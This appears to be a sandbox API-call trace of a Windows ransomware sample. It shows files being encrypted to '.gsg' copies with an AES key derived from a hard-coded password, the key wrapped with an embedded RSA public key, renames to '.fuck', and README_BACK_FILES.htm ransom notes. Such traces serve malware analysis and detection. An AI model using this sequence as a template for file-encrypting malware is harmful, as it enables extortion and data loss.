hTemplateFile=0x0) returned 0x5d10 [0241.484] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.486] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.490] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.490] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.490] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.490] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.490] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.491] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.491] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f4be8) returned 1 [0241.492] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4be8, dwCertEncodingType=0x1, pInfo=0x2906e18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906e48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906e50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e81f8) returned 1 [0241.492] CryptEncrypt (in: hKey=0x28e81f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.492] CryptEncrypt (in: hKey=0x28e81f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f48b8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f48b8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.492] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f48b8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.493] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.493] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.493] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.494] CloseHandle (hObject=0xffffffff) returned 1 [0241.494] CloseHandle (hObject=0x5d10) returned 1 [0241.496] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.017.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.017.etl"), bFailIfExists=0) returned 0 [0241.506] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl", dwFileAttributes=0x2000) returned 0 [0241.507] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.017.etl.gsg")) returned 1 [0241.508] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.017.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.017.etl.fuck")) returned 0 [0241.509] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.509] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.509] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.509] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.509] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.509] GetLastError () returned 0x5 [0241.509] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.018.etl")) returned 0x2020 [0241.510] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl", dwFileAttributes=0x80) returned 0 [0241.510] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.018.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.511] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.018.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.511] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.512] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.515] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.515] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.515] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.515] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.515] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.515] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.515] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f4ad8) returned 1 [0241.516] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4ad8, dwCertEncodingType=0x1, pInfo=0x2906938*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906968*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906970*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e80f8) returned 1 [0241.516] CryptEncrypt (in: hKey=0x28e80f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.516] CryptEncrypt (in: hKey=0x28e80f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4d80*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f4d80*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.516] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f4d80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f4d80*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.517] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.517] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.518] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.518] CloseHandle (hObject=0xffffffff) returned 1 [0241.518] CloseHandle (hObject=0x5d10) returned 1 [0241.519] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.018.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.018.etl"), bFailIfExists=0) returned 0 [0241.527] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl", dwFileAttributes=0x2000) returned 0 [0241.527] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.018.etl.gsg")) returned 1 [0241.529] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.018.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.018.etl.fuck")) returned 0 [0241.529] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.529] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.529] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.529] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.529] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.530] GetLastError () returned 0x5 [0241.530] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.019.etl")) returned 0x2020 [0241.530] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl", dwFileAttributes=0x80) returned 0 [0241.530] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.019.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.531] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.019.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.531] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.532] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.535] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.535] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.535] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.535] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.535] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.535] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.536] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f40c0) returned 1 [0241.536] CryptImportPublicKeyInfo (in: hCryptProv=0x28f40c0, dwCertEncodingType=0x1, pInfo=0x2906868*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906898*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29068a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e8238) returned 1 [0241.536] CryptEncrypt (in: hKey=0x28e8238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.536] CryptEncrypt (in: hKey=0x28e8238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4588*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f4588*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.536] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f4588*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f4588*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.537] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.537] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.538] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.538] CloseHandle (hObject=0xffffffff) returned 1 [0241.538] CloseHandle (hObject=0x5d10) returned 1 [0241.538] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.019.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.019.etl"), bFailIfExists=0) returned 0 [0241.546] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl", dwFileAttributes=0x2000) returned 0 [0241.546] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.019.etl.gsg")) returned 1 [0241.548] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.019.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.019.etl.fuck")) returned 0 [0241.548] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.549] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.549] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.549] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.549] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0241.549] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0241.549] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\usoshared\\logs\\readme_back_files.htm")) returned 0x20 [0241.549] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.550] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0241.550] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0241.550] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\usoshared\\readme_back_files.htm")) returned 0x20 [0241.550] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0241.550] FindClose (in: hFindFile=0x282e3b8 | out: hFindFile=0x282e3b8) returned 1 [0241.550] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\readme_back_files.htm")) returned 0x20 [0241.550] FindNextFileA (in: hFindFile=0x282ddf8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0241.550] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x28e84f8 [0241.550] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.551] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.551] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28e8578 [0241.551] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.551] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.551] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e8638 [0241.551] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.551] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.551] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e88b8 [0241.553] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0241.553] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0241.553] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e7978 [0241.554] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0241.554] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0241.554] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e7d78 [0241.565] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0241.565] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0241.566] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0241.566] GetLastError () returned 0x12 [0241.566] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt15.lst")) returned 0x20 [0241.567] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst", dwFileAttributes=0x80) returned 1 [0241.567] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt15.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0241.567] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt15.lst.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0241.568] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst.gsg", dwFileAttributes=0x2) returned 1 [0241.568] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0241.571] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0241.571] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.571] CryptHashData (hHash=0x28e82b8, pbData=0x2856ed0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.571] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e82b8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e8078) returned 1 [0241.571] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: 